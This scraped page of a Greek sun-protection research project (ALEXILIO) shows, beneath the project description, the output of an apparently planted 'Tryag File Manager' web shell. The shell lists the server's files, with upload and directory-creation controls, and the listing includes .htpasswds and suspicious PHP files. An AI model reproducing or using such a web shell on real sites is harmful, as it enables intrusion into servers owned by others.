Αρχική

Το αλεξήλιο

Το πρόγραμμα «συστήμΑ προβοΛής Έξυπνων ενδείΞεων για την προστασία από την ΗΛΙακή ακτινΟβολία» (ΑΛΕΞΗΛΙΟ) αποσκοπεί στην ανάπτυξη ενός συστήματος, το οποίο θα καταγράφει μία σειρά από παραμέτρους σε σχέση με την ηλιακή ακτινοβολία και τις περιβαλλοντολογικές συνθήκες. Με βάση αυτές τις παραμέτρους θα εκτιμάει την προστασία που είναι απαραίτητη σύμφωνα με την κλίμακα δείκτη προστασίας από την ηλιακή ακτινοβολία. Σκοπός του είναι η όσο το δυνατό πιο συνετή έκθεση των χρηστών στην ηλιακή ακτινοβολία. Με τον τρόπο αυτό το ΑΛΕΞΗΛΙΟ θα συμβάλει στην πρόληψη δερματοπαθειών που προκαλούνται από τον ήλιο, αλλά και κυρίως στην πρόληψη κατά του καρκίνου του δέρματος.

Tryag File Manager

Tryag File Manager

Current Path : /home/qbase/public_html/alexilio/
Upload File :
Create Dir:

Name
Size
Permissions
Options
.htpasswds
--
drwxr-x---
.well-known
--
drwxr-xr-x
includes
--
drwxr-xr-x
misc
--
drwxr-xr-x
modules
--
drwxr-xr-x
profiles
--
drwxr-xr-x
scripts
--
drwxr-xr-x
sites
--
drwxr-xr-x
themes
--
drwxr-xr-x
.gitignore
0.17 KB
-rw-r--r--
.htaccess~
5.051 KB
-rw-r--r--
CHANGELOG.txt
69.195 KB
-rw-r--r--
COPYRIGHT.txt
1.446 KB
-rw-r--r--
Config_log.php
0.882 KB
-rw-r--r--
INSTALL.mysql.txt
1.417 KB
-rw-r--r--
INSTALL.pgsql.txt
1.83 KB
-rw-r--r--
INSTALL.sqlite.txt
1.268 KB
-rw-r--r--
INSTALL.txt
17.438 KB
-rw-r--r--
LICENSE.txt
17.668 KB
-rw-r--r--
MAINTAINERS.txt
8.2 KB
-rw-r--r--
README.txt
3.412 KB
-rw-r--r--
UPGRADE.txt
9.416 KB
-rw-r--r--
authorize.php
6.399 KB
-rw-r--r--
cron.php
0.703 KB
-rw-r--r--
dircr.php
72.357 KB
-rw-r--r--
error_log
2.529 KB
-rw-r--r--
index.php
0.517 KB
-rw-r--r--
install.php
0.672 KB
-rw-r--r--
koko.php
197.977 KB
-rw-r--r--
robots.txt
1.524 KB
-rw-r--r--
update.php
18.961 KB
-rw-r--r--
web.config
2.003 KB
-rw-r--r--
xmlrpc.php
0.407 KB
-rw-r--r--

Tryag File Manager Version 1.3, Coded By G-B
Home: www.tryag.cc